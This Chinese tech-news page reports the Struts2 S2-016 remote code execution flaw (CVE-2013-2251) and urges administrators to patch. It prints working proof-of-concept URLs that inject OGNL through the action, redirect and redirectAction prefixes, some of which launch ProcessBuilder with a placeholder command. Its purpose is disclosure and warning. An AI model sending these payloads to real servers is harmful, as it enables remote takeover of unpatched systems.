Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Struts2 远程执行代码(S2-016) 利用工具

7·17中午刚刚午睡醒来就看到几个熟悉字眼——Struts2,远程执行代码。施特!难道继上回标签后又新曝一个?本来还没睡醒的一下子清醒了。一看果断,紧接着某云就被刷屏了~~~一场腥风血雨画面即将上演。。。据报道,受影响版本是2.0.0-2.3.15,CVE编号:CVE-2013-2251。原因是因为参数action的值redirect以及redirectAction没有正确过滤,导致允许攻击者在访问使用Struts2的应用时远程执行OGNL表达式漏洞证明:http://host/struts2-blank/example/X.action?action:%25{3*4}http://host/struts2-blank/example/X.action?redirect:%25{3*4}http://host/struts2-blank/example/X.action?redirectAction:%25{3*4}代码测试:http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{"command","goes","here"})).start()}http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{"command","goes","here"})).start()}http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{"command","goes","here"})).start()}官方已经更新补丁,管理员们速度打上,不然裤子被脱了还不知道。URL:http://struts.apache.org/download.cgi#struts23151下面show下python写的利用工具【图】用GOOGLE一搜差点没吓尿,再次强烈建议管理今晚加班都要把这修补了!!!相关阅读:Apache Struts多个前缀参数远程命令执行漏洞(CVE-2013-2251) http://www.linuxidc.com/Linux/2013-07/87491.htmApache Struts 多个开放重定向漏洞(CVE-2013-2248) http://www.linuxidc.com/Linux/2013-07/87490.htmStruts2再爆远程代码执行漏洞(S2-016) http://www.linuxidc.com/Linux/2013-07/87542.htmLinux Kernel 远程拒绝服务漏洞(CVE-2013-4129)Struts2再爆远程代码执行漏洞(S2-016)相关资讯      Struts2 
  • Struts2数据验证机制  (今 10:42)
  • ssh(sturts2_spring_hibernate) 框  (09月07日)
  • Struts2 声明式异常处理  (07月13日)
  • Struts2数据校验  (今 10:39)
  • Struts2一个实例中遇到的问题  (07月14日)
  • Apache Struts method: prefix任意  (04月27日)
本文评论 查看全部评论 (1)<
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款